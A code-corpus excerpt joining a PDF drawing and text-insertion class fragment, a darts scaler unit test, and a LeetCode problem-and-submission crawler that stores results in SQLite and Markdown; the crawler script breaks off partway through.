            q2 = C.y + math.sin(alfa + betar) * rad
            Q = Point(q1, q2)  # the arc's end point
            r1 = C.x + math.cos(alfa + beta2) * rad / math.cos(beta2)
            r2 = C.y + math.sin(alfa + beta2) * rad / math.cos(beta2)
            R = Point(r1, r2)  # crossing point of tangents
            # kappa height is 4/3 of segment height
            kappah = (1 - math.cos(beta2)) * 4 / 3 / abs(R - Q)  # kappa height
            kappa = kappah * abs(P - Q) / (1 - math.cos(betar))
            cp1 = P + (R - P) * kappa  # control point 1
            cp2 = Q + (R - Q) * kappa  # control point 2
            self.draw_cont += l4 % JM_TUPLE(list(cp1 * self.ipctm) + \
                                            list(cp2 * self.ipctm) + \
                                            list(Q * self.ipctm))
        if fullSector:
            # close the pie slice: end point -> center -> arc end
            self.draw_cont += l3 % JM_TUPLE(point * self.ipctm)
            self.draw_cont += l5 % JM_TUPLE(center * self.ipctm)
            self.draw_cont += l5 % JM_TUPLE(Q * self.ipctm)
        self.lastPoint = Q
        return self.lastPoint

    def drawRect(self, rect):
        """Draw a rectangle.
        """
        r = Rect(rect)
        self.draw_cont += "%g %g %g %g re\n" % JM_TUPLE(list(r.bl * self.ipctm) + \
                                                        [r.width, r.height])
        self.updateRect(r)
        self.lastPoint = r.tl
        return self.lastPoint

    def drawQuad(self, quad):
        """Draw a Quad.
        """
        q = Quad(quad)
        return self.drawPolyline([q.ul, q.ll, q.lr, q.ur, q.ul])

    def drawZigzag(self, p1, p2, breadth = 2):
        """Draw a zig-zagged line from p1 to p2.
""" p1 = Point(p1) p2 = Point(p2) S = p2 - p1 # vector start - end rad = abs(S) # distance of points cnt = 4 * int(round(rad / (4 * breadth), 0)) # always take full phases if cnt < 4: raise ValueError("points too close") mb = rad / cnt # revised breadth matrix = TOOLS._hor_matrix(p1, p2) # normalize line to x-axis i_mat = ~matrix # get original position points = [] # stores edges for i in range (1, cnt): if i % 4 == 1: # point "above" connection p = Point(i, -1) * mb elif i % 4 == 3: # point "below" connection p = Point(i, 1) * mb else: # ignore others continue points.append(p * i_mat) self.drawPolyline([p1] + points + [p2]) # add start and end points return p2 def drawSquiggle(self, p1, p2, breadth = 2): """Draw a squiggly line from p1 to p2. """ p1 = Point(p1) p2 = Point(p2) S = p2 - p1 # vector start - end rad = abs(S) # distance of points cnt = 4 * int(round(rad / (4 * breadth), 0)) # always take full phases if cnt < 4: raise ValueError("points too close") mb = rad / cnt # revised breadth matrix = TOOLS._hor_matrix(p1, p2) # normalize line to x-axis i_mat = ~matrix # get original position k = 2.4142135623765633 # y of drawCurve helper point points = [] # stores edges for i in range (1, cnt): if i % 4 == 1: # point "above" connection p = Point(i, -k) * mb elif i % 4 == 3: # point "below" connection p = Point(i, k) * mb else: # else on connection line p = Point(i, 0) * mb points.append(p * i_mat) points = [p1] + points + [p2] cnt = len(points) i = 0 while i + 2 < cnt: self.drawCurve(points[i], points[i+1], points[i+2]) i += 2 return p2 #============================================================================== # Shape.insertText #============================================================================== def insertText(self, point, buffer, fontsize=11, fontname="helv", fontfile=None, set_simple=0, encoding=0, color=None, fill=None, render_mode=0, border_width=1, rotate=0, morph=None): # ensure 'text' is a list of strings, worth dealing with if not 
bool(buffer): return 0 if type(buffer) not in (list, tuple): text = buffer.splitlines() else: text = buffer if not len(text) > 0: return 0 point = Point(point) try: maxcode = max([ord(c) for c in " ".join(text)]) except: return 0 # ensure valid 'fontname' fname = fontname if fname.startswith("/"): fname = fname[1:] xref = self.page.insertFont(fontname=fname, fontfile=fontfile, encoding=encoding, set_simple=set_simple, ) fontinfo = CheckFontInfo(self.doc, xref) fontdict = fontinfo[1] ordering = fontdict["ordering"] simple = fontdict["simple"] bfname = fontdict["name"] if maxcode > 255: glyphs = self.doc.getCharWidths(xref, maxcode + 1) else: glyphs = fontdict["glyphs"] tab = [] for t in text: if simple and bfname not in ("Symbol", "ZapfDingbats"): g = None else: g = glyphs tab.append(getTJstr(t, g, simple, ordering)) text = tab color_str = ColorCode(color, "c") fill_str = ColorCode(fill, "f") if fill is None and render_mode == 0: # ensure fill color when 0 Tr fill = color fill_str = ColorCode(color, "f") morphing = CheckMorph(morph) rot = rotate if rot % 90 != 0: raise ValueError("rotate not multiple of 90") while rot < 0: rot += 360 rot = rot % 360 # text rotate = 0, 90, 270, 180 templ1 = "\nq BT\n%s1 0 0 1 %g %g Tm /%s %g Tf " templ2 = "TJ\n0 -%g TD\n" cmp90 = "0 1 -1 0 0 0 cm\n" # rotates 90 deg counter-clockwise cmm90 = "0 -1 1 0 0 0 cm\n" # rotates 90 deg clockwise cm180 = "-1 0 0 -1 0 0 cm\n" # rotates by 180 deg. height = self.height width = self.width lheight = fontsize * 1.2 # line height # setting up for standard rotation directions # case rotate = 0 if morphing: m1 = Matrix(1, 0, 0, 1, morph[0].x + self.x, height - morph[0].y - self.y) mat = ~m1 * morph[1] * m1 cm = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat) else: cm = "" top = height - point.y - self.y # start of 1st char left = point.x + self.x # start of 1. 
char space = top # space available headroom = point.y + self.y # distance to page border if rot == 90: left = height - point.y - self.y top = -point.x - self.x cm += cmp90 space = width - abs(top) headroom = point.x + self.x elif rot == 270: left = -height + point.y + self.y top = point.x + self.x cm += cmm90 space = abs(top) headroom = width - point.x - self.x elif rot == 180: left = -point.x - self.x top = -height + point.y + self.y cm += cm180 space = abs(point.y + self.y) headroom = height - point.y - self.y if headroom < fontsize: # at least 1 full line space required! raise ValueError("text starts outside page") nres = templ1 % (cm, left, top, fname, fontsize) if render_mode > 0: nres += "%i Tr " % render_mode if border_width != 1: nres += "%g w " % border_width if color is not None: nres += color_str if fill is not None: nres += fill_str # ========================================================================= # start text insertion # ========================================================================= nres += text[0] nlines = 1 # set output line counter nres += templ2 % lheight # line 1 for i in range(1, len(text)): if space < lheight: break # no space left on page if i > 1: nres += "\nT* " nres += text[i] + templ2[:2] space -= lheight nlines += 1 nres += " ET Q\n" # ========================================================================= # end of text insertion # ========================================================================= # update the /Contents object self.text_cont += nres return nlines #============================================================================== # Shape.insertTextbox #============================================================================== def insertTextbox(self, rect, buffer, fontname="helv", fontfile=None, fontsize=11, set_simple=0, encoding=0, color=None, fill=None, expandtabs=1, border_width=1, align=0, render_mode=0, rotate=0, morph=None): """ Insert text into a given rectangle. 
Args: rect -- the textbox to fill buffer -- text to be inserted fontname -- a Base-14 font, font name or '/name' fontfile -- name of a font file fontsize -- font size color -- RGB stroke color triple fill -- RGB fill color triple render_mode -- text rendering control border_width -- thickness of glyph borders expandtabs -- handles tabulators with string function align -- left, center, right, justified rotate -- 0, 90, 180, or 270 degrees morph -- morph box with a matrix and a pivotal point Returns: unused or deficit rectangle area (float) """ rect = Rect(rect) if rect.isEmpty or rect.isInfinite: raise ValueError("text box must be finite and not empty") color_str = ColorCode(color, "c") fill_str = ColorCode(fill, "f") if fill is None and render_mode == 0: # ensure fill color for 0 Tr fill = color fill_str = ColorCode(color, "f") if rotate % 90 != 0: raise ValueError("rotate must be multiple of 90") rot = rotate while rot < 0: rot += 360 rot = rot % 360 # is buffer worth of dealing with? if not bool(buffer): return rect.height if rot in (0, 180) else rect.width cmp90 = "0 1 -1 0 0 0 cm\n" # rotates counter-clockwise cmm90 = "0 -1 1 0 0 0 cm\n" # rotates clockwise cm180 = "-1 0 0 -1 0 0 cm\n" # rotates by 180 deg. height = self.height fname = fontname if fname.startswith("/"): fname = fname[1:] xref = self.page.insertFont(fontname=fname, fontfile=fontfile, encoding=encoding, set_simple=set_simple, ) fontinfo = CheckFontInfo(self.doc, xref) fontdict = fontinfo[1] ordering = fontdict["ordering"] simple = fontdict["simple"] glyphs = fontdict["glyphs"] bfname = fontdict["name"] # create a list from buffer, split into its lines if type(buffer) in (list, tuple): t0 = "\n".join(buffer) else: t0 = buffer maxcode = max([ord(c) for c in t0]) # replace invalid char codes for simple fonts if simple and maxcode > 255: t0 = "".join([c if ord(c)<256 else "?" 
for c in t0]) t0 = t0.splitlines() glyphs = self.doc.getCharWidths(xref, maxcode + 1) if simple and bfname not in ("Symbol", "ZapfDingbats"): tj_glyphs = None else: tj_glyphs = glyphs #---------------------------------------------------------------------- # calculate pixel length of a string #---------------------------------------------------------------------- def pixlen(x): """Calculate pixel length of x.""" if ordering < 0: return sum([glyphs[ord(c)][1] for c in x]) * fontsize else: return len(x) * fontsize #---------------------------------------------------------------------- if ordering < 0: blen = glyphs[32][1] * fontsize # pixel size of space character else: blen = fontsize text = "" # output buffer lheight = fontsize * 1.2 # line height if CheckMorph(morph): m1 = Matrix(1, 0, 0, 1, morph[0].x + self.x, self.height - morph[0].y - self.y) mat = ~m1 * morph[1] * m1 cm = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat) else: cm = "" #--------------------------------------------------------------------------- # adjust for text orientation / rotation #--------------------------------------------------------------------------- progr = 1 # direction of line progress c_pnt = Point(0, fontsize) # used for line progress if rot == 0: # normal orientation point = rect.tl + c_pnt # line 1 is 'fontsize' below top pos = point.y + self.y # y of first line maxwidth = rect.width # pixels available in one line maxpos = rect.y1 + self.y # lines must not be below this elif rot == 90: # rotate counter clockwise c_pnt = Point(fontsize, 0) # progress in x-direction point = rect.bl + c_pnt # line 1 'fontsize' away from left pos = point.x + self.x # position of first line maxwidth = rect.height # pixels available in one line maxpos = rect.x1 + self.x # lines must not be right of this cm += cmp90 elif rot == 180: # text upside down c_pnt = -Point(0, fontsize) # progress upwards in y direction point = rect.br + c_pnt # line 1 'fontsize' above bottom pos = point.y + self.y # position of first 
line maxwidth = rect.width # pixels available in one line progr = -1 # subtract lheight for next line maxpos = rect.y0 + self.y # lines must not be above this cm += cm180 else: # rotate clockwise (270 or -90) c_pnt = -Point(fontsize, 0) # progress from right to left point = rect.tr + c_pnt # line 1 'fontsize' left of right pos = point.x + self.x # position of first line maxwidth = rect.height # pixels available in one line progr = -1 # subtract lheight for next line maxpos = rect.x0 + self.x # lines must not left of this cm += cmm90 #======================================================================= # line loop #======================================================================= just_tab = [] # 'justify' indicators per line for i, line in enumerate(t0): line_t = line.expandtabs(expandtabs).split(" ") # split into words lbuff = "" # init line buffer rest = maxwidth # available line pixels #=================================================================== # word loop #=================================================================== for word in line_t: pl_w = pixlen(word) # pixel len of word if rest >= pl_w: # will it fit on the line? lbuff += word + " " # yes, and append word rest -= (pl_w + blen) # update available line space continue # word won't fit - output line (if not empty) if len(lbuff) > 0: lbuff = lbuff.rstrip() + "\n" # line full, append line break text += lbuff # append to total text pos += lheight * progr # increase line position just_tab.append(True) # line is justify candidate lbuff = "" # re-init line buffer rest = maxwidth # re-init avail. space if pl_w <= maxwidth: # word shorter than 1 line? lbuff = word + " " # start the line with it rest = maxwidth - pl_w - blen # update free space continue # long word: split across multiple lines - char by char ... 
if len(just_tab) > 0: just_tab[-1] = False # reset justify indicator for c in word: if pixlen(lbuff) <= maxwidth - pixlen(c): lbuff += c else: # line full lbuff += "\n" # close line text += lbuff # append to text pos += lheight * progr # increase line position just_tab.append(False) # do not justify line lbuff = c # start new line with this char lbuff += " " # finish long word rest = maxwidth - pixlen(lbuff) # long word stored if lbuff != "": # unprocessed line content? text += lbuff.rstrip() # append to text just_tab.append(False) # do not justify line if i < len(t0) - 1: # not the last line? text += "\n" # insert line break pos += lheight * progr # increase line position more = (pos - maxpos) * progr # difference to rect size limit if more > EPSILON: # landed too much outside rect return (-1) * more # return deficit, don't output more = abs(more) if more < EPSILON: more = 0 # don't bother with epsilons nres = "\nq BT\n" + cm # initialize output buffer templ = "1 0 0 1 %g %g Tm /%s %g Tf " # center, right, justify: output each line with its own specifics spacing = 0 text_t = text.splitlines() # split text in lines again for i, t in enumerate(text_t): pl = maxwidth - pixlen(t) # length of empty line part pnt = point + c_pnt * (i * 1.2) # text start of line if align == 1: # center: right shift by half width if rot in (0, 180): pnt = pnt + Point(pl / 2, 0) * progr else: pnt = pnt - Point(0, pl / 2) * progr elif align == 2: # right: right shift by full width if rot in (0, 180): pnt = pnt + Point(pl, 0) * progr else: pnt = pnt - Point(0, pl) * progr elif align == 3: # justify spaces = t.count(" ") # number of spaces in line if spaces > 0 and just_tab[i]: # if any, and we may justify spacing = pl / spaces # make every space this much larger else: spacing = 0 # keep normal space length top = height - pnt.y - self.y left = pnt.x + self.x if rot == 90: left = height - pnt.y - self.y top = -pnt.x - self.x elif rot == 270: left = -height + pnt.y + self.y top = pnt.x + self.x 
elif rot == 180: left = -pnt.x - self.x top = -height + pnt.y + self.y nres += templ % (left, top, fname, fontsize) if render_mode > 0: nres += "%i Tr " % render_mode if spacing != 0: nres += "%g Tw " % spacing if color is not None: nres += color_str if fill is not None: nres += fill_str if border_width != 1: nres += "%g w " % border_width nres += "%sTJ\n" % getTJstr(t, tj_glyphs, simple, ordering) nres += "ET Q\n" self.text_cont += nres self.updateRect(rect) return more def finish( self, width=1, color=None, fill=None, lineCap=0, lineJoin=0, roundCap=None, dashes=None, even_odd=False, morph=None, closePath=True ): """Finish the current drawing segment. Notes: Apply stroke and fill colors, dashes, line style and width, or morphing. Also determines whether any open path should be closed by a connecting line to its start point. """ if self.draw_cont == "": # treat empty contents as no-op return if roundCap is not None: warnings.warn("roundCap is replaced by lineCap / lineJoin", DeprecationWarning) lineCap = lineJoin = roundCap if width == 0: # border color makes no sense then color = None elif color is None: # vice versa width = 0 color_str = ColorCode(color, "c") # ensure proper color string fill_str = ColorCode(fill, "f") # ensure proper fill string if width not in (0, 1): self.draw_cont += "%g w\n" % width if lineCap + lineJoin > 0: self.draw_cont += "%i J %i j\n" % (lineCap, lineJoin) if dashes is not None and len(dashes) > 0: self.draw_cont += "%s d\n" % dashes if closePath: self.draw_cont += "h\n" self.lastPoint = None if color is not None: self.draw_cont += color_str if fill is not None: self.draw_cont += fill_str if color is not None: if not even_odd: self.draw_cont += "B\n" else: self.draw_cont += "B*\n" else: if not even_odd: self.draw_cont += "f\n" else: self.draw_cont += "f*\n" else: self.draw_cont += "S\n" if CheckMorph(morph): m1 = Matrix(1, 0, 0, 1, morph[0].x + self.x, self.height - morph[0].y - self.y) mat = ~m1 * morph[1] * m1 self.draw_cont = "%g 
%g %g %g %g %g cm\n" % JM_TUPLE(mat) + self.draw_cont self.totalcont += "\nq\n" + self.draw_cont + "Q\n" self.draw_cont = "" self.lastPoint = None return def commit(self, overlay=True): """Update the page's /Contents object with Shape data. The argument controls whether data appear in foreground (default) or background. """ CheckParent(self.page) # doc may have died meanwhile self.totalcont += self.text_cont if not fitz_py2: # need bytes if Python > 2 self.totalcont = bytes(self.totalcont, "utf-8") # make /Contents object with dummy stream xref = TOOLS._insert_contents(self.page, b" ", overlay) # update it with potential compression self.doc._updateStream(xref, self.totalcont) self.lastPoint = None # clean up ... self.rect = None # self.draw_cont = "" # for possible ... self.text_cont = "" # ... self.totalcont = "" # re-use return
36.734792
203
0.492287
795a9fcfcd2c53197c31c0c6904812fa36cba2a7
2,457
py
Python
darts/tests/test_transformer.py
LeoTafti/darts
210605fafb730de564e3d723ab3919ed94da42b9
[ "Apache-2.0" ]
null
null
null
darts/tests/test_transformer.py
LeoTafti/darts
210605fafb730de564e3d723ab3919ed94da42b9
[ "Apache-2.0" ]
null
null
null
darts/tests/test_transformer.py
LeoTafti/darts
210605fafb730de564e3d723ab3919ed94da42b9
[ "Apache-2.0" ]
null
null
null
import unittest import logging import numpy as np from sklearn.preprocessing import MinMaxScaler, StandardScaler from ..preprocessing import ScalerWrapper from ..utils import timeseries_generation as tg class TransformerTestCase(unittest.TestCase): __test__ = True series1 = tg.random_walk_timeseries(length=100) * 20 - 10. series2 = series1.stack(tg.random_walk_timeseries(length=100) * 20 - 100.) @classmethod def setUpClass(cls): logging.disable(logging.CRITICAL) def test_scaling(self): self.series3 = self.series1[:1] transformer1 = ScalerWrapper(MinMaxScaler(feature_range=(0, 2))) transformer2 = ScalerWrapper(StandardScaler()) series1_tr1 = transformer1.fit_transform(self.series1) series1_tr2 = transformer2.fit_transform(self.series1) series3_tr2 = transformer2.transform(self.series3) transformer3 = ScalerWrapper(MinMaxScaler(feature_range=(0, 2))) transformer4 = ScalerWrapper(StandardScaler()) series2_tr3 = transformer3.fit_transform(self.series2) series2_tr4 = transformer4.fit_transform(self.series2) # should comply with scaling constraints self.assertAlmostEqual(min(series1_tr1.values().flatten()), 0.) self.assertAlmostEqual(max(series1_tr1.values().flatten()), 2.) self.assertAlmostEqual(np.mean(series1_tr2.values().flatten()), 0.) self.assertAlmostEqual(np.std(series1_tr2.values().flatten()), 1.) self.assertAlmostEqual(min(series2_tr3.values().flatten()), 0.) self.assertAlmostEqual(max(series2_tr3.values().flatten()), 2.) self.assertAlmostEqual(np.mean(series2_tr4.values().flatten()), 0.) self.assertAlmostEqual(np.std(series2_tr4.values().flatten()), 1.) 
# test inverse transform series1_recovered = transformer2.inverse_transform(series1_tr2) series2_recovered = transformer3.inverse_transform(series2_tr3) series3_recovered = transformer2.inverse_transform(series3_tr2) np.testing.assert_almost_equal(series1_recovered.values().flatten(), self.series1.values().flatten()) np.testing.assert_almost_equal(series2_recovered.values().flatten(), self.series2.values().flatten()) self.assertEqual(series1_recovered.width, self.series1.width) self.assertEqual(series2_recovered.width, self.series2.width) self.assertEqual(series3_recovered, series1_recovered[:1])
44.672727
109
0.726496
795a9fe6a8cbac736c6591b593f8010cd49119a3
22,210
py
Python
leetcode-crawler.py
liuyang2356/leetcode-crawler
cdb9fca7e97fb00c00295c7db68d8bd6ff491461
[ "MIT" ]
35
2019-04-17T07:37:37.000Z
2022-01-26T07:19:17.000Z
leetcode-crawler.py
liuyang2356/leetcode-crawler
cdb9fca7e97fb00c00295c7db68d8bd6ff491461
[ "MIT" ]
4
2020-04-07T15:22:21.000Z
2022-01-23T21:41:39.000Z
leetcode-crawler.py
liuyang2356/leetcode-crawler
cdb9fca7e97fb00c00295c7db68d8bd6ff491461
[ "MIT" ]
18
2019-08-25T14:45:32.000Z
2022-02-27T15:46:41.000Z
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import sqlite3 import json import traceback import html2text import os import requests from requests_toolbelt import MultipartEncoder import random,time import re import argparse,sys import threading db_path = 'leetcode.db' user_agent = r'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36' def initLock(l): global lock lock = l threadLock = threading.Lock() # 获取题目信息线程 class insetQuestionThread(threading.Thread): def __init__(self, title_slug, *args): threading.Thread.__init__(self) self.title_slug = title_slug self.status = None if len(args) == 1: self.status = args[0] def run(self): IS_SUCCESS = False conn = sqlite3.connect(db_path, timeout=10) while not IS_SUCCESS: try: # 休眠随机 1-3 秒,以免爬去频率过高被服务器禁掉 time.sleep(random.randint(1, 3)) cursor = conn.cursor() session = requests.Session() headers = {'User-Agent': user_agent, 'Connection': 'keep-alive', 'Content-Type': 'application/json', 'Referer': 'https://leetcode.com/problems/' + self.title_slug} url = "https://leetcode.com/graphql" params = {'operationName': "getQuestionDetail", 'variables': {'titleSlug': self.title_slug}, 'query': '''query getQuestionDetail($titleSlug: String!) 
{ question(titleSlug: $titleSlug) { questionId questionFrontendId questionTitle questionTitleSlug content difficulty stats similarQuestions categoryTitle topicTags { name slug } } }''' } json_data = json.dumps(params).encode('utf8') question_detail = () resp = session.post(url, data = json_data, headers = headers, timeout = 10) content = resp.json() questionId = content['data']['question']['questionId'] tags = [] for tag in content['data']['question']['topicTags']: tags.append(tag['name']) if content['data']['question']['content'] != None: question_detail = (questionId, content['data']['question']['questionFrontendId'], content['data']['question']['questionTitle'], content['data']['question']['questionTitleSlug'], content['data']['question']['difficulty'], content['data']['question']['content'], self.status) threadLock.acquire() cursor.execute('INSERT INTO question (id, frontend_id, title, slug, difficulty, content, status) VALUES (?, ?, ?, ?, ?, ?, ?)', question_detail) for tag in tags: question_tag = (questionId, tag) cursor.execute('INSERT INTO question_tag (question_id, tag) VALUES (?, ?)', question_tag) conn.commit() print("insert question [%s] success" %(self.title_slug)) threadLock.release() IS_SUCCESS = True # 若出现连接超时或连接错误则继续获取 except (requests.exceptions.Timeout,requests.exceptions.ConnectionError) as error: print(str(error)) cursor.close() conn.close() class LeetcodeCrawler(): def __init__(self): self.session = requests.Session() self.csrftoken = '' self.is_login = False # 获取到 token def get_csrftoken(self): url = 'https://leetcode.com' cookies = self.session.get(url).cookies for cookie in cookies: if cookie.name == 'csrftoken': self.csrftoken = cookie.value break # 登陆 leetcode 账号 def login(self, username, password): url = "https://leetcode.com/accounts/login" params_data = { 'csrfmiddlewaretoken': self.csrftoken, 'login': username, 'password':password, 'next': 'problems' } headers = {'User-Agent': user_agent, 'Connection': 'keep-alive', 'Referer': 
'https://leetcode.com/accounts/login/', "origin": "https://leetcode.com"} m = MultipartEncoder(params_data) headers['Content-Type'] = m.content_type self.session.post(url, headers = headers, data = m, timeout = 10, allow_redirects = False) self.is_login = self.session.cookies.get('LEETCODE_SESSION') != None return self.is_login def get_problems(self, filters): url = "https://leetcode.com/api/problems/all/" headers = {'User-Agent': user_agent, 'Connection': 'keep-alive'} resp = self.session.get(url, headers = headers, timeout = 10) question_list = json.loads(resp.content.decode('utf-8')) question_update_list = [] threads = [] cursor = self.conn.cursor() for question in question_list['stat_status_pairs']: question_id = question['stat']['question_id'] question_slug = question['stat']['question__title_slug'] question_status = question['status'] question_difficulty = "None" level = question['difficulty']['level'] if level == 1: question_difficulty = "Easy" elif level == 2: question_difficulty = "Medium" elif level == 3: question_difficulty = "Hard" if filters.get('difficulty'): if filters['difficulty'] != question_difficulty: continue if filters.get('status'): if filters['status'] != question_status: continue if question['paid_only']: continue cursor.execute('SELECT status FROM question WHERE id = ?', (question_id,)) result = cursor.fetchone() if not result: # 创建新线程 thread = insetQuestionThread(question_slug, question_status) thread.start() while True: #判断正在运行的线程数量,如果小于5则退出while循环, #进入for循环启动新的进程.否则就一直在while循环进入死循环 if(len(threading.enumerate()) < 60): break # 添加线程到线程列表 threads.append(thread) elif self.is_login and question_status != result[0]: question_update_list.append((question_status, question_id)) for t in threads: t.join() cursor.executemany('UPDATE question SET status = ? 
WHERE id = ?', question_update_list) self.conn.commit() cursor.close() def connect_db(self, db_path): self.conn = sqlite3.connect(db_path, timeout = 10) cursor = self.conn.cursor() query_table_exists = "SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name = 'question';" cursor.execute(query_table_exists) if cursor.fetchone()[0] == 0: cursor.execute('''CREATE TABLE question (id INT PRIMARY KEY NOT NULL, frontend_id INT NOT NULL, title CHAR(50) NOT NULL, slug CHAR(50) NOT NULL, difficulty CHAR(10) NOT NULL, content TEXT NOT NULL, status CHAR(10));''') query_table_exists = "SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name = 'last_ac_submission_record';" cursor.execute(query_table_exists) if cursor.fetchone()[0] == 0: cursor.execute('''CREATE TABLE last_ac_submission_record (id INT PRIMARY KEY NOT NULL, question_slug CHAR(50) NOT NULL, timestamp INT NOT NULL, language CHAR(10) NOT NULL, code TEXT, runtime CHAR(10));''') query_table_exists = "SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name = 'question_tag';" cursor.execute(query_table_exists) if cursor.fetchone()[0] == 0: cursor.execute('''CREATE TABLE question_tag (question_id INT NOT NULL, tag CHAR(30) NOT NULL);''') cursor.close() def generate_questions_markdown(self, path, filters): if not os.path.isdir(path): os.mkdir(path) cursor = self.conn.cursor() cursor.execute("SELECT * FROM question") for row in cursor: question_detail = { 'id': row[0], 'frontedId': row[1], 'title': row[2], 'slug': row[3], 'difficulty': row[4], 'content': row[5], 'status': row[6] } if not self.filter_question(question_detail, filters): continue tags = '' tag_cursor = self.conn.cursor() tag_cursor.execute('SELECT tag FROM question_tag WHERE question_id = ?', (row[0],)) tag_list = tag_cursor.fetchall() for tag in tag_list: tags += tag[0] + ', ' if len(tags) > 2: tags = tags[:-2] question_detail['tags'] = tags has_get_code = filters.__contains__('code') self.generate_question_markdown(question_detail, 
path, has_get_code) cursor.close() def filter_question(self, question_detail, filters): if filters.get('difficulty'): if filters['difficulty'] != question_detail['difficulty']: return False if filters.get('status'): if filters['status'] != question_detail['status']: return False tag_cursor = self.conn.cursor() tag_cursor.execute('SELECT tag FROM question_tag WHERE question_id = ?', (question_detail['id'],)) tag_list = tag_cursor.fetchall() tag_cursor.close() if filters.get('tags'): tag_count = 0 for tag in tag_list: if tag[0] in filters['tags']: tag_count += 1 if tag_count != len(filters['tags']): return False return True def get_ac_question_submission(self, filters): if not self.is_login: return sql = "SELECT id,slug,difficulty,status FROM question WHERE status = 'ac';" cursor = self.conn.cursor() cursor.execute(sql) results = cursor.fetchall() threads = [] slug_list = [] for row in results: question_detail = { 'id': row[0], 'slug': row[1], 'difficulty': row[2], 'status': row[3] } if not self.filter_question(question_detail, filters): continue slug = question_detail['slug'] slug_list.append(question_detail['slug']) IS_SUCCESS = False while not IS_SUCCESS: try: url = "https://leetcode.com/graphql" params = {'operationName': "Submissions", 'variables':{"offset":0, "limit":20, "lastKey": '', "questionSlug": slug}, 'query': '''query Submissions($offset: Int!, $limit: Int!, $lastKey: String, $questionSlug: String!) 
{ submissionList(offset: $offset, limit: $limit, lastKey: $lastKey, questionSlug: $questionSlug) { lastKey hasNext submissions { id statusDisplay lang runtime timestamp url isPending __typename } __typename } }''' } json_data = json.dumps(params).encode('utf8') headers = {'User-Agent': user_agent, 'Connection': 'keep-alive', 'Referer': 'https://leetcode.com/accounts/login/', "Content-Type": "application/json", 'x-csrftoken': self.csrftoken} resp = self.session.post(url, data = json_data, headers = headers, timeout = 10) content = resp.json() for submission in content['data']['submissionList']['submissions']: if submission['statusDisplay'] == "Accepted": cursor.execute("SELECT COUNT(*) FROM last_ac_submission_record WHERE id =" + str(submission['id'])) if cursor.fetchone()[0] == 0: IS_GET_SUBMISSION_SUCCESS = False while not IS_GET_SUBMISSION_SUCCESS: code_content = self.session.get("https://leetcode.com" + submission['url'], headers = headers, timeout = 10) pattern = re.compile( r'submissionCode: \'(?P<code>.*)\',\n editCodeUrl', re.S ) m1 = pattern.search(code_content.text) code = m1.groupdict()['code'] if m1 else None if not code: print('WARN: Can not get [{}] solution code'.format(slug)) continue IS_GET_SUBMISSION_SUCCESS = True submission_detail = (submission['id'], slug, submission['timestamp'], submission['lang'], submission['runtime'], code) cursor.execute("INSERT INTO last_ac_submission_record (id, question_slug, timestamp, language, runtime, code) VALUES(?, ?, ?, ?, ?, ?)", submission_detail) print("insert submission[%s] success" % (submission['id'])) self.conn.commit() IS_SUCCESS = True break except (requests.exceptions.Timeout,requests.exceptions.ConnectionError) as error: print(str(error)) finally: pass cursor.close() def generate_question_markdown(self, question, path, has_get_code): text_path = os.path.join(path, "{:0>3d}-{}".format(question['frontedId'], question['slug'])) if not os.path.isdir(text_path): os.mkdir(text_path) with 
open(os.path.join(text_path, "README.md"), 'w', encoding='utf-8') as f: f.write("# [{}][title]\n".format(question['title'])) f.write("\n## Description\n\n") text = question['content'] content = html2text.html2text(text).replace("**Input:**", "Input:").replace("**Output:**", "Output:").replace('**Explanation:**', 'Explanation:').replace('\n ', ' ') f.write(content) f.write("\n**Tags:** {}\n".format(question['tags'])) f.write("\n**Difficulty:** {}\n".format(question['difficulty'])) f.write("\n## 思路\n") if self.is_login and has_get_code: sql = "SELECT code, language FROM last_ac_submission_record WHERE question_slug = ? ORDER BY timestamp" cursor = self.conn.cursor() cursor.execute(sql, (question['slug'],)) submission = cursor.fetchone() cursor.close() if submission != None: f.write("\n``` %s\n" %(submission[1])) f.write(submission[0].encode('utf-8').decode('unicode_escape')) f.write("\n```\n") f.write("\n[title]: https://leetcode.com/problems/{}\n".format(question['slug'])) def generate_questions_submission(self, path, filters): if not self.is_login: return sql = """ SELECT l.question_slug, l.code,l.language, q.frontend_id,max(l.timestamp) FROM last_ac_submission_record as l,question as q WHERE l.question_slug == q.slug and q.status = 'ac' GROUP BY l.question_slug """ cursor = self.conn.cursor() cursor.execute(sql) filter_cursor = self.conn.cursor() for submission in cursor: filter_cursor.execute("SELECT id,slug,difficulty,status FROM question WHERE slug = ?", (submission[0],)) result = filter_cursor.fetchone() question_detail = { 'id': result[0], 'slug': result[1], 'difficulty': result[2], 'status': result[3] } if not self.filter_question(question_detail, filters): continue self.generate_question_submission(path, submission) cursor.close() filter_cursor.close() def generate_question_submission(self, path, submission): if not os.path.isdir(path): os.mkdir(path) text_path = os.path.join(path, "{:0>3d}-{}".format(submission[3], submission[0])) if not 
os.path.isdir(text_path): os.mkdir(text_path) with open(os.path.join(text_path, "solution.class"), 'w', encoding='utf-8') as f: f.write(submission[1].encode('utf-8').decode('unicode_escape')) def close_db(self): self.conn.close() if __name__=='__main__': parser = argparse.ArgumentParser() parser.add_argument("output", nargs = '?', default="note") parser.add_argument('-d', '--difficulty', nargs = '+', choices = ['Easy', 'Medium', 'Hard'], help = "Specify the difficulty.\n" "If not specified, all problems will be grasped.") parser.add_argument('-t', '--tags', nargs = '+', help = "Specify the tag") parser.add_argument('-v', '--verbose', action = "store_true", default = False, help = "Verbose output") parser.add_argument('-s', '--status', nargs='+', choices=['ac', 'notac', 'none'], help="Specify the probelms statu.\n" "If not specified, all problems will be grasped.") parser.add_argument('-c', '--code', nargs='+', help="Code solution output path.") parser.add_argument('-u', '--username', nargs='+', help="username") parser.add_argument('-p', '--password', nargs='+', help="password") if len(sys.argv) > 1: args = parser.parse_args() else: parser.print_help() sys.exit(1) argsDict = vars(args) filters = {} test = LeetcodeCrawler() test.get_csrftoken() login_flag = True if argsDict.get('code') or argsDict.get('status'): if not (argsDict.get('username') and argsDict.get('password')): print("ERROR: choice problem by statu or generate submission code must set username and password!") sys.exit() else: is_login = test.login(args.username[0], args.password[0]) if not is_login: print("ERROR: login account fail!") sys.exit() if argsDict.get('code'): 